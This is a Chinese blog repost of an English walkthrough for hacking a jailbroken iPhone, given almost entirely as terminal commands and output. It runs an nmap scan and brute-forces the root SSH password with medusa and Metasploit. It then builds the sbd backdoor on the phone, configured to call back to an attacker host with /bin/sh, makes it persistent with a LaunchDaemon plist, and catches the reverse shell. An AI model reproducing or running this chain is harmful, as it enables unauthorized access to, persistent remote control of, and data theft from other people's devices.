注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

那些星星点点的微芒,终会成为燃烧生命的熊熊之光

 
 
 
 
 

日志

 
 

[转] how to hack an iphone  

2014-05-11 01:39:52|  分类: 安全一路走来 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
msf有段时间没开了,手生~转来留存。

I recently read a report about ios security and an article about installing backdoor on iPhone/iPad.So I write this paper to get some fun.
0x01 nmap scan
left@Dis9team:~$ sudo msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 856 exploits - 475 auxiliary - 144 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops

msf > db_nmap -PN -sS -A 172.22.96.52
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-26 07:22 CST
[*] Nmap: Nmap scan report for localhost (172.22.96.52)
[*] Nmap: Host is up (0.0012s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT      STATE SERVICE    VERSION
[*] Nmap: 21/tcp    open  ftp?
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 22/tcp    open  ssh        OpenSSH 5.8 (protocol 2.0)
[*] Nmap: | ssh-hostkey: 1024 67:22:db:eb:9f:a5:e9:0a:c6:aa:c3:0b:e8:1a:a0:85 (DSA)
[*] Nmap: |_2048 cc:07:0d:ce:7c:17:9b:3c:71:3b:a6:56:48:47:aa:56 (RSA)
[*] Nmap: 62078/tcp open  tcpwrapped
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: phone|general purpose|media device
[*] Nmap: Running (JUST GUESSING): Apple iOS 4.X|5.X|3.X (94%), FreeBSD 6.X (92%), Apple iPhone OS 3.X (89%), Apple Mac OS X 10.5.X|10.6.X|10.7.X (89%)
[*] Nmap: OS CPE: cpe:/o:apple:iphone_os:4 cpe:/o:freebsd:freebsd:6.2 cpe:/o:apple:iphone_os:5 cpe:/o:apple:iphone_os:3 cpe:/o:apple:mac_os_x:10.5 cpe:/o:apple:mac_os_x:10.6 cpe:/o:apple:mac_os_x:10.7.0
[*] Nmap: Aggressive OS guesses: Apple iPhone mobile phone (iOS 4.3.1) (94%), FreeBSD 6.2-RELEASE (92%), Apple iPhone mobile phone (iOS 4.3.3) (90%), Apple iOS 4.2 - 4.3.5 (89%), Apple iOS 4.1 - 4.2.1 (89%), Apple iOS 5 (89%), Apple iPhone OS 3.1.2 - iOS 4.2.1 (89%), Apple Mac OS X 10.5 (Leopard) (Darwin 9.2.2, x86) (89%), Apple Mac OS X 10.5.5 - 10.6.6 (Leopard - Snow Leopard) (Darwin 9.5.0 - 10.6.0) (89%), Apple Mac OS X 10.7.0 - 10.7.1 (Lion) (Darwin 11.0.0 - 11.1.0) (89%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE (using port 22/tcp)
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   1.43 ms localhost (172.22.96.52)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 212.45 seconds
//////////// nmap scan end
0x02 bruteforce ssh
    As bruteforce,medusa is the best.
left@Dis9team:~$ sudo medusa -h 172.22.96.52 -u root -P /tool/H4ckTool/passwords/john.txt -M ssh
Medusa v2.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (1 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: abc123 (2 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (3 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: computer (4 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (5 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: tigger (6 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (7 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: a1b2c3 (8 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: qwerty (9 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (10 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: xxx (11 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: money (12 of 3107 complete)
ACCOUNT CHECK: [ssh] Host: 172.22.96.52 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (13 of 3107 complete)
ACCOUNT FOUND: [ssh] Host: 172.22.96.52 User: root Password: toor [SUCCESS]
//////////// medusa bruteforce end
    We successufully get the root passwd,but we can try metasploit to bruteforce the passwds.
msf > search ssh

Matching Modules
================

   Name                                        Disclosure Date  Rank     Description
   ----                                        ---------------  ----     -----------
   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                    normal   SSH Key Exchange Init Corruption
   auxiliary/fuzzers/ssh/ssh_version_15                         normal   SSH 1.5 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_2                          normal   SSH 2.0 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_corrupt                    normal   SSH Version Corruption
   auxiliary/scanner/ssh/ssh_identify_pubkeys                   normal   SSH Public Key Acceptance Scanner
   auxiliary/scanner/ssh/ssh_login                              normal   SSH Login Check Scanner
   auxiliary/scanner/ssh/ssh_login_pubkey                       normal   SSH Public Key Login Scanner
   auxiliary/scanner/ssh/ssh_version                            normal   SSH Version Scanner
   exploit/windows/ssh/freeftpd_key_exchange   2006-05-12       average  FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
   exploit/windows/ssh/freesshd_key_exchange   2006-05-12       average  FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
   exploit/windows/ssh/putty_msg_debug         2002-12-16       normal   PuTTy.exe <= v0.53 Buffer Overflow
   exploit/windows/ssh/securecrt_ssh1          2002-07-23       average  SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
   exploit/windows/ssh/sysax_ssh_username      2012-02-27       normal   Sysax 5.53 SSH Username Buffer Overflow
   post/linux/gather/enum_network                               normal   Linux Gather Network Information
   post/multi/gather/ssh_creds                                  normal   Multi Gather OpenSSH PKI Credentials Collection
   post/windows/gather/credentials/mremote                      normal   Windows Gather mRemote Saved Password Extraction


msf > use auxiliary/scanner/ssh/ssh_login
msf  auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf  auxiliary(ssh_login) > set RHOST 172.22.96.52
RHOST => 172.22.96.52
msf  auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf  auxiliary(ssh_login) > set PASS_FILE /tool/H4ckTool/passwords/john.txt
PASS_FILE => /tool/H4ckTool/passwords/john.txt
msf  auxiliary(ssh_login) > exploit
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf  auxiliary(ssh_login) > set RHOSTS 172.22.96.52
RHOSTS => 172.22.96.52
msf  auxiliary(ssh_login) > exploit

[*] 172.22.96.52:22 SSH - Starting bruteforce
[*] 172.22.96.52:22 SSH - [0001/3109] - Trying: username: 'root' with password: ''
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0001/3109] - Failed: 'root':''
[*] 172.22.96.52:22 SSH - [0002/3109] - Trying: username: 'root' with password: 'root'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0002/3109] - Failed: 'root':'root'
[*] 172.22.96.52:22 SSH - [0003/3109] - Trying: username: 'root' with password: '12345'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0003/3109] - Failed: 'root':'12345'
[*] 172.22.96.52:22 SSH - [0004/3109] - Trying: username: 'root' with password: 'abc123'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0004/3109] - Failed: 'root':'abc123'
[*] 172.22.96.52:22 SSH - [0005/3109] - Trying: username: 'root' with password: 'password'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0005/3109] - Failed: 'root':'password'
[*] 172.22.96.52:22 SSH - [0006/3109] - Trying: username: 'root' with password: 'computer'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0006/3109] - Failed: 'root':'computer'
[*] 172.22.96.52:22 SSH - [0007/3109] - Trying: username: 'root' with password: '123456'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0007/3109] - Failed: 'root':'123456'
[*] 172.22.96.52:22 SSH - [0008/3109] - Trying: username: 'root' with password: 'tigger'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0008/3109] - Failed: 'root':'tigger'
[*] 172.22.96.52:22 SSH - [0009/3109] - Trying: username: 'root' with password: '1234'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0009/3109] - Failed: 'root':'1234'
[*] 172.22.96.52:22 SSH - [0010/3109] - Trying: username: 'root' with password: 'a1b2c3'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0010/3109] - Failed: 'root':'a1b2c3'
[*] 172.22.96.52:22 SSH - [0011/3109] - Trying: username: 'root' with password: 'qwerty'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0011/3109] - Failed: 'root':'qwerty'
[*] 172.22.96.52:22 SSH - [0012/3109] - Trying: username: 'root' with password: '123'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0012/3109] - Failed: 'root':'123'
[*] 172.22.96.52:22 SSH - [0013/3109] - Trying: username: 'root' with password: 'xxx'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0013/3109] - Failed: 'root':'xxx'
[*] 172.22.96.52:22 SSH - [0014/3109] - Trying: username: 'root' with password: 'money'
[*] Home: /home/left
[-] 172.22.96.52:22 SSH - [0014/3109] - Failed: 'root':'money'
[*] 172.22.96.52:22 SSH - [0015/3109] - Trying: username: 'root' with password: 'toor'
[*] Home: /home/left
[*] Command shell session 1 opened (172.20.10.2:51494 -> 172.22.96.52:22) at 2012-05-26 07:39:30 +0800
[+] 172.22.96.52:22 SSH - [0015/3109] - Success: 'root':'toor' 'sh: id: command not found Darwin Skyw4laker-L3ft 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov  1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin GNU bash, version 4.0.17(1)-release (arm-apple-darwin9) These shell commands are defined internally.  Type `help' to see this list. Type `help name' to find out more about the function `name'. Use `info bash' to find out more about the shell in general. Use `man -k' or `info' to find out more about commands not in this list.  A star (*) next to a name means that the command is disabled.   job_spec [&]                            history [-c] [-d offset] [n] or hist>  (( expression ))                        if COMMANDS; then COMMANDS; [ elif C>  . filename [arguments]                  jobs [-lnprs] [jobspec ...] or jobs >  :                                       kill [-s sigspec | -n signum | -sigs>  [ arg... ]                              let arg [arg ...]  [[ expression ]]                        local [option] name[=value] ...  alias [-p] [name[=value] ... ]          logout [n]  bg [job_spec ...]                       mapfile [-n count] [-O origin] [-s c>  bind [-lpvsPVS] [-m keymap] [-f filen>  popd [-n] [+N | -N]  break [n]                               printf [-v var] format [arguments]  builtin [shell-builtin [arg ...]]       pushd [-n] [+N | -N | dir]  caller [expr]                           pwd [-LP]  case WORD in [PATTERN [| PATTERN]...)>  read [-ers] [-a array] [-d delim] [->  cd [-L|-P] [dir]                        readarray [-n count] [-O origin] [-s>  command [-pVv] command [arg ...]        readonly [-af] [name[=value] ...] or>  compgen [-abcdefgjksuv] [-o option]  >  return [n]  complete [-abcdefgjksuv] [-pr] [-o op>  select NAME [in WORDS ... ;] do COMM>  compopt [-o|+o option] [name ...]       set [--abefhkmnptuvxBCHP] [-o option>  continue [n]                            shift [n]  coproc [NAME] command [redirections]    shopt [-pqsu] [-o] [optname ...]  declare [-aAfFilrtux] [-p] [name[=val>  source filename [arguments]  dirs [-clpv] [+N] [-N]                  suspend [-f]  disown [-h] [-ar] [jobspec ...]         test [expr]  echo [-neE] [arg ...]                   time [-p] pipeline  enable [-a] [-dnps] [-f filename] [na>  times  eval [arg ...]                          trap [-lp] [[arg] signal_spec ...]  exec [-cl] [-a name] [command [argume>  true  exit [n]                                type [-afptP] name [name ...]  export [-fn] [name[=value] ...] or ex>  typeset [-aAfFilrtux] [-p] name[=val>  false                                   ulimit [-SHacdefilmnpqrstuvx] [limit>  fc [-e ename] [-lnr] [first] [last] o>  umask [-p] [-S] [mode]  fg [job_spec]                           unalias [-a] name [name ...]  for NAME [in WORDS ... ] ; do COMMAND>  unset [-f] [-v] [name ...]  for (( exp1; exp2; exp3 )); do COMMAN>  until COMMANDS; do COMMANDS; done  function name { COMMANDS ; } or name >  variables - Names and meanings of so>  getopts optstring name [arg]            wait [id]  hash [-lr] [-p pathname] [-dt] [name >  while COMMANDS; do COMMANDS; done  help [-ds] [pattern ...]                { COMMANDS ; } sh: line 1: ?: command not found '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
/////////////// metasploit ssh bruteforce end
0x03 install a backdoor
  Nowadays it's easy to get some backdoors for smart mobile phone.Maybe sometimes a perl reverse shell can meet your demands already.But my friends recommend me a very good backdoor that can work on iPhone fantastically.That's sbd,it encrypt the net data.You can download it from http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz. So let's go.
///////////////// create the backdoor
left@Dis9team:~$ ssh -l root 172.22.96.52
The authenticity of host '172.22.96.52 (172.22.96.52)' can't be established.
RSA key fingerprint is cc:07:0d:ce:7c:17:9b:3c:71:3b:a6:56:48:47:aa:56.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.22.96.52' (RSA) to the list of known hosts.
root@172.22.96.52's password: 
Skyw4laker-L3ft:~ root# uname -a
Darwin Skyw4laker-L3ft 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov  1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
///////////// you must install gcc on the iphone 
Skyw4laker-L3ft:~ root# pwd  
/var/root
Skyw4laker-L3ft:~ root# tar zxvf sbd-1.36.tar.gz 
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
Skyw4laker-L3ft:~ root# cd sbd-1.36
Skyw4laker-L3ft:~/sbd-1.36 root# ls
CHANGES   aes.c     doexec_unix.h   pel.c     sbd.h
COPYING   aes.h     doexec_win32.h  pel.h     sha1.c
Makefile  binaries  misc.h        readwrite.h  sha1.h
README      doexec.c  mktarball.sh    sbd.c     socket_code.h

/////configure the backdoor by edit sbd.h
Skyw4laker-L3ft:~ root# cat sbd.h
#define HOST NULL
#define PORT 0
#define SOURCE_PORT 0
#define DOLISTEN 0
#define EXECPROG NULL
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "welcome!hacker!"
#define RESPAWN_ENABLED 0
#define RESPAWN_INTERVAL 0
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define DOLISTEN 0
#define HOST "172.20.10.2"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/sh"
//////////// create the backdoor
Skyw4laker-L3ft:~ root# make
usage:
  make unix     - Linux, NetBSD, FreeBSD, OpenBSD
  make sunos    - SunOS (Solaris)
  make win32    - native win32 console app (w/ Cygwin + MinGW)
  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
  make mingw    - native win32 console app (w/ MinGW MSYS)
  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
  make cygwin   - Cygwin console app
  make darwin   - Darwin
Skyw4laker-L3ft:~ root# make darwin
///////////// configure the backdoor on iPhone to be a long-sessioned shell
Skyw4laker-L3ft:~ root# cp sbd /usr/bin/h4ck    
Skyw4laker-L3ft:~ root# cd /Library/LaunchDaemons/
Skyw4laker-L3ft:/Library/LaunchDaemons root# ls
com.openssh.sshd.plist
Skyw4laker-L3ft:/Library/LaunchDaemons root# cat come.h4ck.start.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.h4ck.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/h4ck</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
Skyw4laker-L3ft:/Library/LaunchDaemons root# ls
com.openssh.sshd.plist    come.h4ck.start.plist
Skyw4laker-L3ft:/Library/LaunchDaemons root# 
/// create the backdoor end
0x04 connect the shell
    slave:
Skyw4laker-L3ft:~/sbd-1.36 root# h4ck -k secret 172.20.10.2 4444
    hacker:
left@Dis9team:~/Downloads/sbd-1.36$ sudo ./sbd -l -p 4444 -k secret
uname -a
Darwin Skyw4laker-L3ft 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov  1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
0x05  remove the shell
    quite easy
    on the slave:
Skyw4laker-L3ft:~/sbd-1.36 root# rm /Library/LaunchDaemons/come.h4ck.start.plist 
Skyw4laker-L3ft:~/sbd-1.36 root# rm /usr/bin/h4ck

  评论这张
 
阅读(286)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017